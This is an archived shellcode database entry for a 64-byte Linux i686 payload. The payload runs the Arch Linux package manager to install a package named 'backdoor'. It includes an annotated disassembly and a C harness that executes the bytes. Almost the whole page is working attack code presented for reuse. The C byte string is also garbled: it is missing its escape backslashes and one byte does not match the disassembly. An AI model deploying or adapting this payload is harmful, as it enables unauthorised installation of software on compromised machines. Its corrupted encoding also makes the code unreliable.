[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes
# Published : 2010-01-24
# Author : Jonathan Salwan
# Previous Title : Serial port shell binding, busybox Launching shellcode
# Next Title : Linux i686 - pacman -R <package> - 59 bytes
/*
Title : Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes
Author : Jonathan Salwan
Mail : submit [!] shell-storm.org
Web : http://www.shell-storm.org
Pacman is a software package manager, developed as part of the Arch Linux distribution.
With this shellcode you can install the backdoor packages.
! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ !
Disassembly of section .text:
08048054 <.text>:
8048054: 31 c0 xor %eax,%eax
8048056: 31 db xor %ebx,%ebx
8048058: 31 c9 xor %ecx,%ecx
804805a: 31 d2 xor %edx,%edx
804805c: 31 f6 xor %esi,%esi
804805e: 52 push %edx
804805f: 68 64 6f 6f 72 push $0x726f6f64 << This is a package
8048064: 68 62 61 63 6b push $0x6b636162 << (backdoor). You can change it.
8048069: 89 e6 mov %esp,%esi
804806b: 52 push %edx
804806c: 66 68 2d 53 pushw $0x532d
8048070: 89 e1 mov %esp,%ecx
8048072: 52 push %edx
8048073: 68 63 6d 61 6e push $0x6e616d63
8048078: 68 6e 2f 70 61 push $0x61702f6e
804807d: 68 72 2f 62 69 push $0x69622f72
8048082: 68 2f 2f 75 73 push $0x73752f2f
8048087: 89 e3 mov %esp,%ebx
8048089: 52 push %edx
804808a: 56 push %esi
804808b: 51 push %ecx
804808c: 53 push %ebx
804808d: 89 e1 mov %esp,%ecx
804808f: b0 0b mov $0xb,%al
8048091: 99 cltd
8048092: cd 80 int $0x80
*/
#include <stdio.h>
int main(void)
{
char shellcode[] =
"x31xc0x31xdbx31xc9x31"
"xd2x31xf6x52x68x64x6f"
"x6fx72x68x62x61x63x6b"
"x89xe6x52x66x68x2dx52"
"x89xe1x52x68x63x6dx61"
"x6ex68x6ex2fx70x61x68"
"x72x2fx62x69x68x2fx2f"
"x75x73x89xe3x52x56x51"
"x53x89xe1xb0x0bx99xcd"
"x80";
printf("Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}